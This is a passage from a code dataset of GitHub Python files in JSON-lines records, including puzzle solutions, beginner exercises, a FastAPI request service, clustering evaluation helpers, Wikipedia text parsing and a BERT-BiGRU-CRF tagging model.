pegs[to_peg][-1]))\n pegs[to_peg].append(pegs[from_peg].pop())\n expected_pegs1 = [[], [], list(reversed(range(1, num_rings + 1)))]\n expected_pegs2 = [[], list(reversed(range(1, num_rings + 1))), []]\n if pegs not in (expected_pegs1, expected_pegs2):\n raise TestFailure('Pegs doesn\\'t place in the right configuration')\n\n\nif __name__ == '__main__':\n exit(\n generic_test.generic_test_main('15-01-hanoi.py', 'hanoi.tsv',\n compute_tower_hanoi_wrapper))\n","repo_name":"jayantsolanki/EPIJudgePython","sub_path":"epi_judge_python/15-01-hanoi.py","file_name":"15-01-hanoi.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"24911570718","text":"import sys\n\nf = sys.stdin.read().splitlines()\n\nword_dict = {'Y': 'e', 'e': 's', 's': 'Y'}\n\nfor curr_str in f[1:]:\n if not set(curr_str).issubset({'Y', 'e', 's'}):\n print(\"NO\")\n continue\n\n found = True\n for i, char in enumerate(curr_str[1:]):\n if word_dict[curr_str[i]] != char:\n found = False\n break\n\n if found:\n print(\"YES\")\n else:\n 
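# A quick sanity check of the recursions above (an illustrative sketch, not part
# of the original file): both implementations emit exactly 2**n - 1 moves, e.g.
#
#     moves = compute_tower_hanoi(4)
#     assert len(moves) == 2 ** 4 - 1    # 15 moves
#     assert moves[0] == [0, 1]          # the smallest disk goes to the buffer peg first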
print(\"NO\")\n","repo_name":"JJModern/coding_questions","sub_path":"yesyes.py","file_name":"yesyes.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"22384092446","text":"# filter filters an iterable; the result is a filter object\n# in Python 2 it was a built-in function, Python 3 changed it into a built-in class\nages = [12, 3, 4, 22, 34, 53, 18]\n# filter takes two arguments: the first is a function, the second an iterable\n\n# <filter object at 0x000002967A1C8910>\n# x is an object of type filter\nx = filter(lambda ele: ele > 18, ages)\nprint(x)\n\n# for i in x:\n#     print(i)\n# convert the iterable into a list\nadult = list(x)\nprint(adult)\n\n\n","repo_name":"ASKTIME/PythonDemo","sub_path":"Day_09/12-filter的使用.py","file_name":"12-filter的使用.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"94"} +{"seq_id":"26064754833","text":"# Compared with 3.03.01_SVLR_without_Bias_Loss.py, we now go beyond the per-sample Loss and compute the Cost to update theta,\n# so from here on the computations are vectorized\n# code for the case where the mini-batch is the whole dataset of 100 samples\n\n# import required modules\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom dataset_generator import dataset_generator\nimport basic_nodes as nodes\n\n# dataset preparation\ndataset_gen = dataset_generator()\ndataset_gen.set_coefficient([5,0])\nx_data, y_data = dataset_gen.make_dataset()\ndataset_gen.dataset_visualizer()\n\n# model implementation\nnode1 = nodes.mul_node()\n\n# square error loss implementation\nnode2 = nodes.minus_node()\nnode3 = nodes.square_node()\nnode4 = nodes.mean_node()\n\n# hyperparameter setting\nepochs = 50 # total epoch setting\nlr = 0.05 # learning rate setting\n\nth = -1 # arbitrary theta (=weight)\ncost_list = []\nth_list = []\n\nfor epoch in range(epochs):\n    X, Y = x_data, y_data\n    # X.shape, Y.shape == (100,1); X and Y each hold 100 samples\n\n    # forward propagation\n    Z1 = node1.forward(th, X)\n    Z2 = node2.forward(Y, Z1)\n    L = node3.forward(Z2)\n    J = node4.forward(L)\n    # Z1, Z2, L all have shape (100,1)\n    # J has shape (1)\n    \n    # backward propagation\n    dL = node4.backward(1)\n    dZ2 = node3.backward(dL)\n    dY, dZ1 = node2.backward(dZ2)\n    dTh, dX = node1.backward(dZ1)\n    # dL, dZ2, dZ1, dTh all have shape (100,1)\n\n    # update theta\n    th = th - lr*np.sum(dTh)\n\n    th_list.append(th)\n    cost_list.append(J)\n\n","repo_name":"DoubleS-Lee/Deep_learning","sub_path":"Mathmatic Basic Theory/3.05.03_SVLR_without_Bias_Cost.py","file_name":"3.05.03_SVLR_without_Bias_Cost.py","file_ext":"py","file_size_in_byte":1616,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"71169232310","text":"#! /usr/bin/python3\n\n# Implement a web request interface to interact with Ricequant.\n\nfrom requests import Request, Session, exceptions\nimport re, json\n\nfrom . import file\n\nheaders = {\n        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0',\n        'Accept': 'application/json, text/javascript, */*; q=0.01',\n        'Accept-Language': 'zh,zh-CN;q=0.7,en-US;q=0.3',\n        # 'Referer': rqConfig.rqEndpointUrl,\n        'X-Requested-With': 'XMLHttpRequest',\n        'DNT': '1',\n        'Connection': 'keep-alive',\n        'Sec-Fetch-Dest': 'empty',\n        'Sec-Fetch-Mode': 'cors',\n        'Sec-Fetch-Site': 'same-origin',\n        'Pragma': 'no-cache',\n        'Cache-Control': 'no-cache',\n        'TE': 'trailers'\n        }\n\ndef prepareGenericRequest(urlRoute, urlParams, headers, method, sensitive=True):\n    \n    webRequest = Request(method, urlRoute, params=urlParams, headers=headers)\n    session = Session()\n    sess = session.prepare_request(webRequest)\n    \n    resp = session.send(sess) # send the request\n\n    return resp\n\n","repo_name":"duoduoffff/biquge-crawler","sub_path":"Utility/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"29462569074","text":"from datetime import datetime\n\nfrom typing import Optional\nfrom fastapi import APIRouter, status, HTTPException\n\nfrom enums.request_status import RequestStatusEnum\nfrom dtos.pagination import Pagination\nfrom dtos.request import (\n    CreateRequestPayload,\n    CreateRequestResponse,\n    GetRequestsQuery,\n    GetRequestsResponse,\n    UpdateRequestPayload,\n    UpdateRequestResponse,\n)\nfrom repositories import request as RequestRepository\n\n\nrouter = APIRouter()\n\n\n@router.get(\n    \"\",\n    response_description=\"Retrieve requests\",\n    response_model=GetRequestsResponse,\n    status_code=status.HTTP_200_OK,\n)\nasync def get_requests(\n    account_to: Optional[str] = None,\n    account_from: Optional[str] = None,\n    status: Optional[str] = None,\n    kind: Optional[str] = None,\n    size: Optional[int] = 10,\n    page: Optional[int] = 1,\n):\n    # TODO: add docstring\n\n    requests, total = await RequestRepository.get_many(\n        GetRequestsQuery(\n            account_to=account_to,\n            account_from=account_from,\n            status=status,\n            kind=kind,\n        ),\n        Pagination(size=size, page=page),\n    )\n\n    return GetRequestsResponse(data=requests, total=total, size=size, page=page)\n\n\n@router.post(\n    \"\",\n    response_description=\"Create a request\",\n    response_model=CreateRequestResponse,\n    status_code=status.HTTP_201_CREATED,\n)\nasync def create_request(payload: CreateRequestPayload):\n    # TODO: add docstring\n    # TODO: check if similar request already created\n    for _, v in payload.dict().items():\n        if v is None:\n            raise HTTPException(\n                status_code=status.HTTP_422_UNPROCESSABLE_ENTITY,\n                detail=\"Request payload not complete\",\n            )\n\n    request = await RequestRepository.create_one(\n        CreateRequestPayload(\n            account_to=payload.account_to,\n            account_from=payload.account_from,\n            kind=payload.kind,\n            payload=payload.payload,\n            is_encrypted=payload.is_encrypted,\n        )\n    )\n\n    return CreateRequestResponse(data=request)\n\n\n@router.put(\n    \"/{id}/approve\",\n    response_description=\"Approve request\",\n    response_model=UpdateRequestResponse,\n    status_code=status.HTTP_202_ACCEPTED,\n)\nasync def approve_request(id: str):\n    # TODO: add docstring\n\n    request = await RequestRepository.get_by_id(id)\n\n    if request is None:\n        raise HTTPException(\n            status_code=status.HTTP_404_NOT_FOUND,\n            detail=\"Request not found\",\n        )\n\n    if request.status != RequestStatusEnum.PENDING:\n        raise HTTPException(\n            status_code=status.HTTP_400_BAD_REQUEST,\n            detail=\"Request status not pending\",\n        )\n\n    update 
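# Hypothetical usage of prepareGenericRequest from the network.py record above
# (the URL and params are placeholders, not from that project):
#     resp = prepareGenericRequest("https://example.com/api", {"q": "novel"}, headers, "GET")
#     print(resp.status_code)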
= UpdateRequestPayload(\n        status=RequestStatusEnum.APPROVED,\n        approved_at=datetime.now(),\n    )\n    result = await RequestRepository.update_by_id(id, update)\n\n    if result.modified_count < 1:\n        raise HTTPException(\n            status_code=status.HTTP_400_BAD_REQUEST,\n            detail=\"Update request failed\",\n        )\n\n    return UpdateRequestResponse(data=request, update=update)\n\n\n@router.put(\n    \"/{id}/reject\",\n    response_description=\"Reject request\",\n    response_model=UpdateRequestResponse,\n    status_code=status.HTTP_202_ACCEPTED,\n)\nasync def reject_request(id: str):\n    # TODO: add docstring\n\n    request = await RequestRepository.get_by_id(id)\n\n    if request is None:\n        raise HTTPException(\n            status_code=status.HTTP_404_NOT_FOUND,\n            detail=\"Request not found\",\n        )\n\n    if request.status != RequestStatusEnum.PENDING:\n        raise HTTPException(\n            status_code=status.HTTP_400_BAD_REQUEST,\n            detail=\"Request status not pending\",\n        )\n\n    update = UpdateRequestPayload(\n        status=RequestStatusEnum.REJECTED,\n        rejected_at=datetime.now(),\n    )\n    result = await RequestRepository.update_by_id(id, update)\n\n    if result.modified_count < 1:\n        raise HTTPException(\n            status_code=status.HTTP_400_BAD_REQUEST,\n            detail=\"Update request failed\",\n        )\n\n    return UpdateRequestResponse(data=request, update=update)\n","repo_name":"AriaHealth/tee-service-python","sub_path":"routes/request.py","file_name":"request.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"94"} +{"seq_id":"15374635577","text":"import json\n\nimport d_time\nimport d_weather\n\ndef loadJSON(name):\n    contents_file = open(name, \"r\")\n    contents = contents_file.read()\n    contents_file.close()\n    return json.loads(contents)\n\ndef writeJSON(name, data):\n    with open(name, \"w\") as fp:\n        json.dump(data, fp)\n\ndef saveFunction(name, seq_id, seq_str):\n    current = loadJSON(\"cmd.json\")\n\n    func = {}\n    func[\"id\"] = len(current)\n    func[\"internal\"] = False\n    func[\"trigger\"] = name\n    func[\"s_id\"] = seq_id\n    func[\"s_str\"] = seq_str\n\n    current[name] = func\n    writeJSON(\"cmd.json\", current)\n","repo_name":"js0nwu/cortana-skill-learner","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"2454845420","text":"# Exercise №1\r\ndef my_func(var_1, var_2):\r\n    if var_2 == 0:\r\n        try:\r\n            x = var_1 // 0\r\n        except ZeroDivisionError:\r\n            x = 0\r\n    else:\r\n        x = var_1 / var_2\r\n    return x\r\nnumber_1 = int(input('Enter a number '))\r\nnumber_2 = int(input('Enter a number '))\r\nprint('Task 1')\r\nprint(my_func(number_1, number_2))\r\n# Exercise №2\r\ndef my_func_1(var_2, var_1, var_3, var_4, var_5, var_6):\r\n    var_1 = input('Enter your first name ')\r\n    var_2 = input('Enter your last name ')\r\n    var_3 = input('Enter your year of birth ')\r\n    var_4 = input('Enter your city of residence ')\r\n    var_5 = input('Enter your email ')\r\n    var_6 = input('Enter your phone number ')\r\n    return var_2, var_1, var_3, var_4, var_5, var_6\r\nprint('Task 2')\r\nprint(my_func_1(var_1=10, var_2=12, var_3=13, var_4=14, var_5=15, var_6=11))\r\n# Exercise №3\r\ndef my_func_3(var_1, var_2, var_3):\r\n    if (var_1 + var_2) > (var_2 +var_3):\r\n        x = (var_1+var_2)\r\n    else :\r\n        x = var_2 + var_3\r\n    if x > (var_3 + var_1):\r\n        x = x\r\n    else:\r\n        x = var_3 + var_1\r\n    return x\r\nprint('Task 3')\r\nprint(my_func_3(1, 4, 3))\r\n# Exercise 4\r\ndef my_func_4(var_1, var_2):\r\n    result = var_1 ** var_2\r\n    return result\r\nprint('Task 4')\r\nprint(my_func_4(3, -1))\r\ndef my_func_4_1(var_1,var_2):\r\n    res = 1\r\n    for i in range(abs(var_2)):\r\n        res *= var_1\r\n    if var_2 >= 0:\r\n        return res\r\n    else:\r\n        return 1 / res\r\nprint(my_func_4_1(3, -2))\r\n# Exercise 5\r\ndef my_func_5(*args):\r\n    x = input('Enter numbers ').split()\r\n    y = len(x)\r\n    sum = 0\r\n    while y != 0 :\r\n        y = y - 1\r\n        b = int(x[y])\r\n        sum += b\r\n    return sum\r\nprint('Task 5')\r\nprint(my_func_5('next'))\r\n# Exercise 6\r\ndef int_func(var_1):\r\n    var_1 = var_1.title()\r\n    return var_1\r\nprint('Task 6')\r\nprint(int_func('text notext super'))\r\ndef int_func(var_1):\r\n    var_1 = var_1.title()\r\n    return var_1\r\nprint(int_func(input('Enter words in lower case ')))\r\n","repo_name":"NikitaSmol67/homeWork-1","sub_path":"homework 3.py","file_name":"homework 3.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"74640314870","text":"import numpy as np\nimport pandas as pd\nimport seaborn as sn\nimport matplotlib.pyplot as plt\nimport sklearn.cluster as sk\nimport sklearn.metrics as metrics\n\ndef evalAccuracy(col_predict, col_label):\n    \"\"\"\n    evalAccuracy\n    ----------------------------------------------------------\n    Find accuracy given estimated classes and actual classes\n    ----------------------------------------------------------\n    Parameters:\n    - col_predict: array containing the predicted classes\n    - col_label: array containing the actual labels\n    ----------------------------------------------------------\n    Outputs:\n    - accuracy (float)\n    \"\"\"\n    if (len(col_predict.shape) > 1 or len(col_label.shape) > 1):\n        if (not all(col_predict.shape[1:] == 1) or not all(col_label.shape[1:] == 1)):\n            raise ValueError(\"The passed arrays are not 1D\")\n    \n    n_elem = col_predict.shape[0]\n    if (col_label.shape[0] != n_elem):\n        raise ValueError(\"The two arrays don't have the same length!\")\n\n    n_classes = len(np.unique(col_label))\n    tmp_sum = np.zeros((n_classes,))\n    tmp_tot = np.zeros((n_classes,))\n    \n    for i in range(n_elem):\n        tmp_tot[int(col_label[i])-1] += 1\n        if col_label[i] == col_predict[i]:\n            tmp_sum[int(col_label[i])-1] += 1\n\n    accuracy = (1/19) * np.sum(tmp_sum/tmp_tot)\n\n    return accuracy\n\n\ndef evalAccuracyClasses(col_predict, col_label):\n    \"\"\"\n    Find accuracy value for each class\n    ----------------------------------------------------------\n    Parameters:\n    - col_predict: array containing the predicted classes\n    - col_label: array containing the actual labels\n    ----------------------------------------------------------\n    Outputs:\n    - accuracy (ndarray)\n    \"\"\"\n    if (len(col_predict.shape) > 1 or len(col_label.shape) > 1):\n        if (not all(col_predict.shape[1:] == 1) or not all(col_label.shape[1:] == 1)):\n            raise ValueError(\"The passed arrays are not 1D\")\n    \n    n_elem = col_predict.shape[0]\n    if (col_label.shape[0] != n_elem):\n        raise ValueError(\"The two arrays don't have the same length!\")\n    \n    n_classes = len(np.unique(col_label))\n    tmp_sum = np.zeros((n_classes,))\n    tmp_tot = np.zeros((n_classes,))\n\n    for i in range(len(col_label)):\n        tmp_tot[int(col_label[i])-1] += 1\n        if col_label[i] == col_predict[i]:\n            tmp_sum[int(col_label[i])-1] += 1\n    \n    acc_classes = tmp_sum/tmp_tot\n\n    return acc_classes\n\n\n\n\ndef plotConfusionMatrix(col_predict, col_label, class_names, title='Confusion Matrix', save_img=False, img_path='./img/conf_matrix.png'):\n    \"\"\"\n    plotConfusionMatrix\n    
----------------------------------------------------------\n Plot the confusion matrix\n ----------------------------------------------------------\n \"\"\"\n cm = metrics.confusion_matrix(col_label, col_predict, normalize='true')\n cm_df = pd.DataFrame(cm, index=class_names, columns=class_names)\n \n plt.figure(figsize=(10, 8))\n ax = sn.heatmap(cm_df, annot=True, cmap='BuPu')\n ax.set_xlabel(\"Predicted class\")\n ax.set_ylabel(\"True class\")\n plt.title(title)\n if save_img:\n plt.savefig(img_path)\n plt.tight_layout()\n plt.show()\n\n return cm\n\n\n\ndef interCentroidDist(centroids, cent_names_axis, plot=False, save_img=False, img_path='img/inter_centroid_dist.png'):\n \"\"\"\n interCentroidDist\n ----------------------------------------------------------\n Evaluate (and plot) the matrix containing as element i,j\n the distance between centroid i and centroid j\n ----------------------------------------------------------\n Parameters:\n - centroids: matrix containing the centroids as rows\n - cent_name_axis: list containing the names of the \n centroids (used as labels of the plot)\n - plot: boolean flag for plotting\n - save_img: boolean flag for saving the image\n - img_path: path indicating where to store the image\n ----------------------------------------------------------\n Outputs:\n - d: square matrix containing in element i, j the distance \n (norm) between element i and element j\n \"\"\"\n \n # Element i, j is squared norm of dist between centroid i and j\n NAc = centroids.shape[0]\n \n d = np.zeros((NAc, NAc))\n\n for i in range(NAc):\n for j in range(i+1, NAc): # Optimization - diagonal elements are 0 and matrix is symmetric\n d[i, j] = np.linalg.norm(centroids[i] - centroids[j])\n d[j, i] = d[i, j]\n\n if plot:\n plt.matshow(d)\n plt.colorbar()\n plt.xticks(np.arange(NAc), cent_names_axis, rotation=90)\n plt.yticks(np.arange(NAc), cent_names_axis)\n plt.title('Between-centroids distance')\n if save_img:\n try:\n plt.savefig(img_path)\n except:\n plt.savefig('lab04/'+img_path)\n plt.show()\n\n return d\n\ndef minCentDist(centroids, cent_dist_matrix = None):\n \"\"\"\n minCentDist\n ----------------------------------------------------------\n Used to find the minimum distance between each centroid \n and all others.\n ----------------------------------------------------------\n Parameters:\n - centroids: matrix containing the centroids as rows\n - cent_dist_matrix: squared matrix of distances between \n centroids\n ----------------------------------------------------------\n Outputs:\n - dmin: ndarray minimum distance between each centroid and \n all others\n \"\"\"\n if cent_dist_matrix is None:\n d = interCentroidDist(centroids, cent_names_axis = None)\n else:\n d = cent_dist_matrix\n\n NAc = centroids.shape[0]\n\n dd = d+np.eye(NAc)*(2*d.max()) # Set distance with itself (=0) to a large value (won't be the min)\n\n dmin = dd.min(axis=0) # Find the minimum distance for each centroid\n\n return dmin\n\ndef avgDistCent(stdpoints):\n \"\"\"\n avgDistCent\n ----------------------------------------------------------\n Evaluate the average distance between the centroids and \n all points of the same cluster\n ----------------------------------------------------------\n Parameters:\n - stdpoints: matrix of standard deviations (w.r.t. 
\n centroids) for each cluster\n ----------------------------------------------------------\n Outputs:\n - dpoints: ndarray containing for each cluster the average \n distance\n \"\"\"\n # Average distance between each centroid and its points \n dpoints = np.sqrt(np.sum(stdpoints**2, axis=1))\n return dpoints\n\ndef centroidSeparationPlot(centroids, stdpoints, cent_names_axis, save_img=False, img_path='img/centroid_sep.png'):\n \"\"\"\n centroidSeparionPlot\n ----------------------------------------------------------\n Plot the comparison between minimum inter-centroid \n distance and average distance between centroids and each \n element of the corresponding cluster\n ----------------------------------------------------------\n Parameters:\n - centroids: matrix containing the centroids as rows\n - stdpoints: matrix of standard deviations (w.r.t. \n centroids) for each cluster\n - cent_name_axis: list containing the names of the \n centroids (used as labels of the plot)\n - save_img: boolean flag for saving the image\n - img_path: path indicating where to store the image\n \"\"\"\n NAc = centroids.shape[0]\n\n dmin = minCentDist(centroids)\n dpoints = avgDistCent(stdpoints)\n\n plt.figure()\n plt.plot(dmin, label='minimum centroid distance')\n plt.plot(dpoints, label='mean distance from points to centroid')\n plt.grid()\n plt.xticks(np.arange(NAc), cent_names_axis, rotation=90)\n plt.legend()\n plt.title('Centroid separation plot')\n plt.tight_layout()\n if save_img:\n plt.savefig(img_path)\n plt.show()\n\n","repo_name":"davmacario/ICTforHealth","sub_path":"lab04/sub/evaluators.py","file_name":"evaluators.py","file_ext":"py","file_size_in_byte":7824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"31824125586","text":"\"\"\"\nWhile instance attributes are specific to each object,\nclass attributes are the same for all instances\n\"\"\"\n\n\nclass Person:\n species = \"mammal\" # Here is the class Attribute\n\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n\nme = Person(\"George\", 25)\nyou = Person(\"John\", 44)\n\nprint(me.name, me.age, me.species) # me.species\nprint(you.name, you.age, you.species) # you.species\n\nprint()\nprint()\nprint()\nprint()\nprint()\n\n\nclass Person2:\n species = \"mammal\" # Here is the class Attribute\n\n def __init__(self, name, age, kg):\n self.name = name\n self.age = age\n self.kg = kg\n\n def eat(self):\n print(\"eating\")\n self.kg += 0.30\n\n\nme2 = Person2(\"George\", 25, 70)\nprint(me2.kg)\nme2.eat()\nprint(me2.kg)\n\n\nprint()\nprint()\nprint()\nprint()\nprint()\n\n\nclass Person3:\n def __init__(self, first_name, last_name, age):\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def get_full_name(self):\n return f\"{self.first_name} {self.last_name}\"\n\n\nme3 = Person3(\"Peter\", \"Johnson\", 64)\nprint(me3.get_full_name())\n","repo_name":"GGI81/Python-fundamentals","sub_path":"Objects and Classes Lab/class Attributes.py","file_name":"class Attributes.py","file_ext":"py","file_size_in_byte":1140,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"94"} +{"seq_id":"33176816321","text":"import sys \n\n# sys.stdin = open(\"input\",\"r\") \n\nfrom collections import *\nfrom heapq import * \nfrom functools import *\nfrom math import *\n\nt = int(input())\nfor _ in range(t):\n n, m = list(map(int,input().split()))\n s = input()\n s = list(map(int,s))\n tot = n*m \n ans = [0]*tot \n cols = [0]*tot 
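# An extra illustration of the class-attribute record above (not in the original
# file): because `species` lives on the class itself, reassigning it once changes
# what every instance reports.
#     Person.species = "primate"
#     assert me.species == you.species == "primate"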
\n for i in range(tot):\n pre = cols[i-m] if i-m >= 0 else 0 \n cols[i] = pre|s[i]\n # print(cols)\n cnt = 0\n for i in range(tot):\n cnt += cols[i]\n if i-m >= 0:\n cnt -= cols[i-m] \n ans[i] += cnt \n # print(ans)\n rows = [0]*(tot+1)\n for i in range(tot):\n rows[i] = s[i]+rows[i-1]\n for i in range(tot)[::-1]:\n if i-m >= 0:\n rows[i] -= rows[i-m]\n # print(rows)\n for i in range(tot):\n rows[i] = 1 if rows[i] else 0\n if i-m >= 0:\n rows[i] += rows[i-m]\n ans[i] += rows[i]\n # print(rows)\n print(*ans)\n\n","repo_name":"zhenfelix/OnlineJudgeCodings","sub_path":"Codeforces/1677B - Tokitsukaze and Meeting.py","file_name":"1677B - Tokitsukaze and Meeting.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"40826248266","text":"import gzip\nimport json\nimport re\n\n\n\n# with open(\"./jawiki-country.json\") as f:\n# jsonData = json.load(f)\n\n # print(jsonData)\ndef extraction(target):\n with gzip.open(\"./jawiki-country.json.gz\",'rt') as f:\n for line in f.readlines():\n json_data = json.loads(line)\n if json_data[\"title\"] == target:\n return json_data[\"text\"]\n\n\ntext = extraction(\"イギリス\")\npattern = r'\\|(?P<key>.*?) = (?P<value>.*)'\nprog = re.compile(pattern)\n# for line in text.split('\\n'):\n# result = prog.match(line)\n# if(result!=None):\n# dic[result.group(\"key\")] = result.group(\"value\")\ndic = dict((prog.match(line).group(\"key\"),prog.match(line).group(\"value\")) for line in text.split('\\n') if prog.match(line)!= None)\n# for key, value in dic.items():\n# print(key,value,sep=' : ')\n# print()\n\n\n\nreplace_pattern = r\"(?P<text>''+.*?''+)\"\nreplace = re.compile(replace_pattern)\nfor key, value in dic.items():\n text = replace.search(value)\n if text != None:\n # print(text.group(\"text\"))\n # print(value)\n value = replace.sub(text.group(\"text\").replace(\"'\",''),value)\n # print(value)\n dic[key] = value\n\n# for key,value in dic.items():\n# print(key,value,sep=' : ')\n# print()\n\n\ndef repl(matchobj):\n if matchobj.group().find('|') == -1:\n return matchobj.group().replace('[','').replace(']','')\n else:\n pattern = r\"\\|(?P<text>.*?)\\]\\]\"\n prog = re.compile(pattern)\n result = prog.search(matchobj.group())\n return result.group(\"text\")\n\nreplace_pattern = r\"\\[\\[(?P<text>(?!ファイル:).*?)\\]\\]\"\nreplace = re.compile(replace_pattern)\nfor key, value in dic.items():\n value = replace.sub(repl,value)\n dic[key] = value\n\n\n\ndef repl1(matchobj):\n return ''\n\ndef repl2(matchobj):\n return matchobj.group(\"text\")\n\ndef repl3(matchobj):\n return matchobj.group(\"text\")\n\npattern1 = r\"<.*>\"\npattern2 = r\"\\{\\{.*\\|(?P<text>.*?)\\}\\}\"\npattern3 = r\"\\[\\[ファイル:.*\\|(?P<text>.*?)\\]\\]\"\nprog1 = re.compile(pattern1)\nprog2 = re.compile(pattern2)\nprog3 = re.compile(pattern3)\nfor key,value in dic.items():\n value = prog1.sub(repl1,value)\n value = prog2.sub(repl2,value)\n value = prog3.sub(repl3,value)\n dic[key] = value\n\n# for key,value in dic.items():\n# print(key,value,sep=' : ')\n\n\n\n\n\nimport requests\n\nS = requests.Session()\n\nURL = \"https://en.wikipedia.org/w/api.php\"\n\nPARAMS = {\n \"action\": \"query\",\n \"format\": \"json\",\n \"prop\": \"imageinfo\",\n \"titles\": \"File:Flag_of_the_United_Kingdom.svg\"\n}\n\nR = S.get(url=URL, params=PARAMS)\nDATA = R.json()\n\nPAGES = DATA[\"query\"][\"pages\"]\n\nfor k, v in PAGES.items():\n print(v[\"title\"] + \" is uploaded by User:\" + v[\"imageinfo\"][0][\"user\"])\n\n\ndef 
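# Worked illustration of the emphasis-stripping step in the jawiki record above
# (the sample value is made up): for value = "'''United Kingdom'''", replace.search
# matches the whole emphasised span and replace.sub rewrites value to
# "United Kingdom" -- the wiki quote markers are dropped while the text is kept.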
printdict(dic,count):\n    if(type(dic)==dict):\n        for key, value in dic.items():\n            print('\\t'*count,key)\n            printdict(value,count+1)\n    elif type(dic) == list:\n        for a in dic:\n            printdict(a,count)\n    else:\n        print(dic)\n\nprintdict(DATA,1)\nprint(DATA[\"query\"][\"pages\"][\"23473560\"][\"imageinfo\"][0][\"user\"])\n\n","repo_name":"matatabinoneko/nlp_100_knock","sub_path":"section03/29.py","file_name":"29.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"96"} +{"seq_id":"34341239305","text":"# -*- coding: utf-8 -*-\nimport pandas as pd\nimport time\nimport numpy as np\n\n#import linalg to compute eigenvalues and eigenvectors\nfrom numpy import linalg as LA\n\n\n# #load excel dataframe\n# fields =['Power (W)','Laser Speed (mm/s)','Hatch Spacing (mm)','Layer Thickness (mm)','Energy Density (J/mm^3)','XY/YZ Density Avg']\n\n\nfields =['Power (W)','Laser Speed (mm/s)','Hatch Spacing (mm)','Layer Thickness (mm)','Energy Density (J/mm^3)']\n# read the data from the excel file\nmyDf = pd.read_excel('Data.xlsx')\n\n#load the selected data columns\nmyDf = myDf[fields]\n\n#compute the covariance matrix and its eigen-decomposition\nprint(\"Covariance matrix: \")\ncov =np.array(myDf.cov())\n\nprint(myDf.cov())\nprint(\"____________________________________________________\")\nprint(\"The eigenvalue/eigenvector pairs: \")\nw, v = LA.eig(cov)\n\n#compute the principal components\n\nfor i in range(0,len(w)):\n\tprint(\"w_\"+str(i+1)+\" = \"+str(round(w[i],2))+\",v_\"+str(i+1)+\" = \"+str(np.around(v[i],decimals=1)))\n\n\nprint(\"The corresponding principal components: \")\nfor i in range(0,len(v)):\n\toutput = \"Y_\"+str(i+1)+\" = \"\n\tfor j in range(0,len(v[0])):\n\t\tif j == 0 or '-' in str(round(v[i][j],2)):\n\t\t\toutput = output + str(round(v[i][j],2)) + \"X_\"+str(j+1)\n\t\telse:\n\t\t\toutput = output +\" + \"+ str(round(v[i][j],2)) + \"X_\"+str(j+1)\n\n\tprint(output)\nw2 = w/sum(w)\n\n\nprint(\"The corresponding variance ratios: \")\nprint(np.around(w2, decimals=2))\n\n# compute the correlation coefficients\nprint(\"________________________________________________________\")\nprint(myDf.corr())","repo_name":"ttdung997/Data-mining-assistant","sub_path":"Basic/numpy-example.py","file_name":"numpy-example.py","file_ext":"py","file_size_in_byte":1521,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"96"} +{"seq_id":"72485459516","text":"from torchcrf import CRF\nfrom torch import nn\nfrom transformers import BertModel, BertPreTrainedModel\nfrom config import need_rnn\n\n\nclass Bert_BiGru_Crf(BertPreTrainedModel):\n    def __init__(self, config, need_birnn=need_rnn, rnn_dim=128, label_num=13):\n        super().__init__(config)\n        self.bert = BertModel(config)\n        self.dropout = nn.Dropout(config.hidden_dropout_prob)\n        self.need_birnn = need_birnn\n        if need_birnn:\n            self.gru = nn.GRU(768,\n                              rnn_dim,\n                              num_layers=2,\n                              bidirectional=True,\n                              dropout=.3,\n                              batch_first=True\n                              )\n            self.fc = nn.Linear(rnn_dim * 2, label_num)  # BOS EOS\n        else:\n            self.fc = nn.Linear(config.hidden_size, label_num)\n        self.crf = CRF(label_num, batch_first=True)\n\n    def forward(self, text, label):\n        out = self.bert(input_ids=text['input_ids'], attention_mask=text['attention_mask']).last_hidden_state\n        if self.need_birnn:\n            out, _ = self.gru(out)\n        out = self.dropout(out)\n        output = self.fc(out)\n        loss = -self.crf(output, label, mask=text['attention_mask'].byte())\n        return loss\n\n    def predict(self, text):\n        \"\"\" Implement the predict interface\n\n        :param text: the input text's input_ids and attention_mask\n        :return: the classes produced by CRF decoding\n        \"\"\"\n        out = self.bert(input_ids=text['input_ids'], attention_mask=text['attention_mask']).last_hidden_state\n        if self.need_birnn:\n            out, _ = self.gru(out)\n\n        out = self.dropout(out)\n        output = self.fc(out)\n        pred = self.crf.decode(output, text['attention_mask'].byte())\n\n        return pred\n","repo_name":"yang-collect/bert-bigru-crf","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"96"} +{"seq_id":"31000391069","text":"import numpy as np\nimport copy\nimport pgmpy.factors\nfrom 